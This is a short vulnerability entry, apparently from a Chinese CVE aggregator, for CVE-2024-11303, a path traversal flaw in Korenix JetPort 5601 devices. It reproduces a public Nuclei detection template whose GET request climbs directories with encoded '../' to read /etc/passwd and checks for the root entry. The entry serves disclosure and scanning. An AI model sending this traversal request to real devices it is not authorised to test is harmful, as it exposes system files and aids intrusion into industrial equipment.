漏洞描述
The pathname of the root directory to a Restricted Directory ('Path Traversal') vulnerability in Korenix JetPort 5601 allows Path Traversal.This issue affects JetPort 5601- through 1.2.
CVE-2024-11303: Korenix JetPort 5601v3 - Path Traversal
PoC代码[已公开]
id: CVE-2024-11303
info:
name: Korenix JetPort 5601v3 - Path Traversal
author: geeknik
severity: high
description: |
The pathname of the root directory to a Restricted Directory ('Path Traversal') vulnerability in Korenix JetPort 5601 allows Path Traversal.This issue affects JetPort 5601- through 1.2.
reference:
- https://seclists.org/fulldisclosure/2024/Nov/8
- https://www.korenix.com/en/about/index.aspx?kind=3
- https://cyberdanube.com/en/en-st-polten-uas-path-traversal-in-korenix-jetport/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
epss-score: 0.06807
epss-percentile: 0.90973
metadata:
max-request: 1
tags: seclists,cve,cve2024,korenix,lfi,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- "text/plain"
- type: status
status:
- 200
# digest: 4a0a0047304502204102ca57769b54560b75f3e5d1143bf5a2eae7041faa4d7ba3f5f72c53a07751022100a3429fa6cf8b094e7e084142a295c95f2636702598a6427c8ec4ce598f6ee7bd:922c64590222798bb761d5b6d8e72950